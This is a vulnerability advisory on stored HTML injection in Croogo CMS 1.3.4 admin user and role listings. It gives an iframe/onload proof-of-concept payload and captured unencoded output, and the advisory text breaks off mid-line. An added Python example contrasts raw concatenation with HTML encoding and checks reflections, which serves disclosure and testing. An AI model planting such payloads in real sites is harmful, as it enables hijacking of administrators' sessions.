source: https://www.securityfocus.com/bid/53287/info

Croogo CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input: values stored in user and role records are written into the administrative listings without being HTML-encoded on output.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Croogo CMS 1.3.4 is vulnerable; other versions may also be affected.

Proof of concept: the probe string "><iframe src=a onload=alert("VL") < was stored through the application and is returned unencoded in the admin user and role listings below, so the injected <iframe> is rendered rather than displayed as text.

URL: http://www.example.com/croogo/admin/users

<td>"><iframe src=a onload=alert("VL") <</td>
<td>asdasd@aol.com</td>
<td><a href="/croogo/admin/users/edit/2">Edit</a> <a href="/croogo/admin/users/delete/2/token:c68c0779f65f5657a8d17c28daebcc7a15fe51e3" onclick="return confirm('Are you sure?');">Delete</a></td></tr>

URL: http://www.example.com/croogo/admin/roles

<tr class="striped"><td>4</td>
<td>"><iframe src=a onload=alert("VL") <</td>
<td> <a href="/croogo/admin/roles/edit/4">Edit</a> <a href="/croogo/admin/roles/delete
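The following is an added example written for this page; it is not code from the advisory or from the Croogo code base. It reproduces the output-encoding failure shown above with the advisory's own probe string: a listing cell that concatenates a stored name straight into markup (the flaw), the same cell rendered with HTML encoding (the fix, equivalent to CakePHP's h() helper that Croogo templates should use), and a classifier a tester can run over a captured response to tell an unencoded reflection from a correctly encoded one. The row layout, e-mail address, and function names are assumptions constructed for illustration, not Croogo identifiers or real data.

```python
"""Added example (not from the Croogo advisory or project): stored HTML
injection in an admin listing, its encoded counterpart, and a reflection check.
All HTML fragments are constructed for illustration."""
import html

# Probe string taken from the advisory's proof of concept.
PAYLOAD = '"><iframe src=a onload=alert("VL") <'


def render_cell_vulnerable(value: str) -> str:
    """The flaw: the stored value is concatenated into the <td> unencoded."""
    return f"<td>{value}</td>"


def render_cell_safe(value: str) -> str:
    """The fix: HTML-encode on output so '<', '>' and '"' cannot break out
    of the text node (CakePHP's h() performs the same transformation)."""
    return f"<td>{html.escape(value, quote=True)}</td>"


def render_listing(names, safe: bool) -> str:
    """Build a constructed admin listing (hypothetical layout modelled on the
    advisory's /admin/users table) from a list of stored names."""
    cell = render_cell_safe if safe else render_cell_vulnerable
    rows = []
    for row_id, name in enumerate(names, start=1):
        rows.append(
            "<tr>"
            f"<td>{row_id}</td>"
            + cell(name)
            + "<td>user@example.com</td>"  # placeholder, not a real address
            + f'<td><a href="/croogo/admin/users/edit/{row_id}">Edit</a></td>'
            "</tr>"
        )
    return "<table>" + "".join(rows) + "</table>"


def classify_reflection(response_html: str, probe: str) -> str:
    """Classify how a probe comes back in a response.

    'unescaped': the probe's markup characters survived intact (a finding).
    'escaped':   only the entity-encoded form is present (correct behaviour).
    'absent':    the probe was not reflected on this page at all.
    """
    if probe in response_html:
        return "unescaped"
    if html.escape(probe, quote=True) in response_html:
        return "escaped"
    return "absent"


if __name__ == "__main__":
    print(render_cell_vulnerable(PAYLOAD))  # matches the <td> in the advisory
    print(render_cell_safe(PAYLOAD))
    for safe in (False, True):
        page = render_listing(["alice", PAYLOAD], safe=safe)
        print("safe" if safe else "vulnerable", "->",
              classify_reflection(page, PAYLOAD))
```

When testing a live instance the probe is stored through the relevant form and the listing is fetched afterwards; the classifier only needs the response body, and an "escaped" result should not be reported as a finding.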